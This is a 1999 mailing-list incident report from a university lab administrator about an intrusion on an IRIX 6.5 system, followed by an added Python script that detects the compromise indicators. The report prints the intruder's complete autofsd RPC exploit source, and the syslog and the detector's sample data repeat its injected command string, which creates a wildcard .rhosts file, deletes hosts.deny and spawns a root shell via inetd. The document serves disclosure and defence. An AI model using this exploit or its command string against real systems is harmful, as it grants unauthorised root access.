Hacker doesn't take a break IRIS 6.5.0

Yiu-Fai Lam (YL2@umail.umd.edu)
Fri, 31 Dec 1999 15:04:31 -0500

Dear Folks,
ATTENTION:

Sorry to find out during the Christmas break that a hacker broke into my
system, running IRIS 6.5.0.
Apparently, a .rhosts file was created "+ + " and new user accounts
were set up with no passwords and with the power of root.
SYSLOG shows that once the rhosts was created, the hackers entered
via the illegal accounts and installed an unknown number of sniff
programs on my system disks.
They created folders: afs_iris and nn, in which there are sniff programs
to spring to other sites.

The following attachment gives you some trace of what they did.
While I am trying to get more expert help, please let me know if you
have any comments or experienced similar attacks during the same period of
time.
I appreciate any help you are willing to share.

Well, what a way to spend New Year's Eve before Y2K!

Sincerely,
Yiu-fai Lam

====================================
Dec 26 03:26:33 xyz autofsd[196]: mount of /hosts/;echo '+ +' >
/.rhosts;rm -rf /etc/hosts.deny; echo "courier stream tcp nowait root
/bin/sh sh -i" > /tmp/bob;inetd /tmp/bob failed

Dec 28 18:20:53 6E:xyz login[40100]: ?@ts025d40.sto-ca.concentric.net as
whatever

Dec 31 01:18:53 6E:xyz login[45746]:
?@178.phoenix-18-19rs.az.dial-access.att.net as whatever

Dec 31 01:22:39 6E:xyz login[37947]:
?@178.phoenix-18-19rs.az.dial-access.att.net as whatever
=========================================================================

The hacker installed a sniffer as afs-irix

total 248
40 -rwxr-xr-x 1 root sys 18260 Dec 29 00:26 aa
40 -rwxr-xr-x 1 root sys 18668 Dec 29 00:19 amd
8 -rw-r--r-- 1 root sys 2759 Dec 29 00:19 autofs.c
152 -rw-r--r-- 1 root sys 74952 Dec 31 11:44 core
8 -rw-r--r-- 1 root sys 1433 Dec 31 11:44 jig
0 -rw------- 1 root sys 0 Dec 31 01:20 nohup.out
===========================================================

# more autofs.c
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <rpc/xdr.h>
#include <signal.h>

#define AUTOFS_PROG ((u_long)100099)
#define AUTOFS_VERS ((u_long)1)
#define AUTOFS_MOUNT ((u_long)1)

#define AT 8
#define A_MAXNAME 255
#define A_MAXOPTS 255
#define A_MAXPATH 1024

struct mntrequest {
char *name; /* name to be looked up */
char *map; /* map to use */
char *opts; /* default options */
char *path; /* mountpoint to use */
};

struct mntres {
int status; /* 0=OK, otherwise an errno from <sys/errno.h>
*/
};

bool_t xdr_mntrequest(XDR *xdrs,struct mntrequest *objp){
if (!xdr_string(xdrs, &objp->name, A_MAXNAME)) return (FALSE);
if (!xdr_string(xdrs, &objp->map, A_MAXNAME)) return (FALSE);
if (!xdr_string(xdrs, &objp->opts, A_MAXOPTS)) return (FALSE);
if (!xdr_string(xdrs, &objp->path, A_MAXPATH)) return (FALSE);
return (TRUE);
}
void signal_handler(void) {
exit(0);
}
bool_t xdr_mntres(XDR *xdrs,struct mntres *objp){
if (!xdr_int(xdrs, &objp->status)) return (FALSE);
return (TRUE);
}

main(int argc, char **argv){

CLIENT *cl;
struct mntrequest mntreq;
struct mntres *res;
struct sockaddr_in target;
struct hostent *hp;
struct timeval tm;
char *host;
enum clnt_stat stat;
FILE *jackfrost;

int sd;

signal(SIGALRM, signal_handler);

alarm(AT);
host=argv[1];

if ((target.sin_addr.s_addr = inet_addr(host)) == -1) {
if ((hp = gethostbyname(host)) == NULL) {
printf("%s: cannot resolve\n", host);
exit(1);
} else
target.sin_addr.s_addr = *(u_long *)hp->h_addr;
}
target.sin_family=AF_INET;
target.sin_port=0;

sd=RPC_ANYSOCK;
tm.tv_sec=8;

tm.tv_usec=0;
if((cl=clntudp_create(&target,AUTOFS_PROG,AUTOFS_VERS,tm,&sd))==NULL)
{
clnt_pcreateerror("clnt_create");
exit(0);
}
cl->cl_auth = authunix_create("localhost", 0, 0, 0, NULL);
tm.tv_sec = 25;

mntreq.name=";echo '+ +' > /.rhosts;rm -rf /etc/hosts.deny; echo
\"courier stream tcp nowait root /bin/sh sh -i\" > /tmp/bob;inetd
/tmp/bob";
mntreq.map="/bin/true";
mntreq.path="/hosts";
mntreq.opts="";
bzero((char *)&res, sizeof(res));

if ((stat = clnt_call(cl, AUTOFS_MOUNT,
(xdrproc_t)xdr_mntrequest,&mntreq,
(xdrproc_t)xdr_mntres, &res, tm)) != RPC_SUCCESS) {
clnt_perror(cl, "clnt_call");
exit(1);
}

jackfrost = fopen("jig", "a");
if ( (int)jackfrost > 0 ) {
fprintf(jackfrost, "%s\n", argv[1]);
fclose(jackfrost);
}
clnt_destroy(cl);
}

===================================================

--
Yiu-fai Lam
NMR Lab. University of Maryland, Bldg #91
Chemistry & Biochemistry Department, College Park, MD 20742.
Phone: 301-405-1869 (Voice-mail), Labs: 405-1870 or 405-8559
Fax : 301-314-9121     E-mail:  YL2@UMAIL.UMD.EDU
WEB: http://oxynmr.umd.edu
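A defender-side check for the three indicators the post describes (shell metacharacters inside an autofsd mount request as logged by syslog, a wildcard /.rhosts, and new accounts with no password or UID 0). This is an added example, not code from the post or from SGI; the sample log and passwd lines are constructed and modelled on the post, and the function names are my own.

```python
import re

# Constructed syslog sample modelled on the autofsd line in the post (not real logs)
SAMPLE_SYSLOG = """\
Dec 26 03:26:33 xyz autofsd[196]: mount of /hosts/;echo '+ +' > /.rhosts;rm -rf /etc/hosts.deny; echo "courier stream tcp nowait root /bin/sh sh -i" > /tmp/bob;inetd /tmp/bob failed
Dec 26 03:30:01 xyz autofsd[196]: mount of /hosts/fileserver1 failed
Dec 28 18:20:53 6E:xyz login[40100]: ?@ts025d40.sto-ca.concentric.net as whatever
"""

# Constructed /etc/passwd sample: normal accounts plus two back-door style entries
SAMPLE_PASSWD = """\
root:x:0:0:Super-User:/:/bin/sh
ylam:x:1001:20:Yiu-fai Lam:/usr/people/ylam:/bin/csh
whatever::0:0::/:/bin/sh
nn:x:0:0::/tmp/nn:/bin/sh
"""

AUTOFSD_MOUNT = re.compile(r"autofsd\[\d+\]: mount of (?P<name>\S.*?) failed$")
SHELL_META = re.compile(r"[;|&`$<>]")

def suspicious_autofsd_mounts(syslog_text):
    """(line_no, map key) for autofsd mount requests whose key carries shell
    metacharacters; a genuine host name or path under /hosts never does."""
    hits = []
    for n, line in enumerate(syslog_text.splitlines(), 1):
        m = AUTOFSD_MOUNT.search(line)
        if m and SHELL_META.search(m.group("name")):
            hits.append((n, m.group("name")))
    return hits

def rhosts_trusts_everyone(rhosts_text):
    """True if /.rhosts has a bare '+' (any host) or '+ +' (any host, any user)."""
    return any(line.split() in (["+"], ["+", "+"]) for line in rhosts_text.splitlines())

def risky_passwd_entries(passwd_text):
    """(user, reasons) for accounts with an empty password field or UID 0 under
    a name other than root, the two traits of the accounts the post describes."""
    findings = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7: continue  # skip malformed or NIS '+' lines
        user, pw, uid = fields[0], fields[1], fields[2]
        reasons = []
        if pw == "":
            reasons.append("empty password")
        if uid == "0" and user != "root":
            reasons.append("uid 0")
        if reasons:
            findings.append((user, reasons))
    return findings
```

On a live host the same functions would be fed the contents of /var/adm/SYSLOG, /.rhosts and /etc/passwd; anything they return is worth treating as a compromise indicator rather than a misconfiguration.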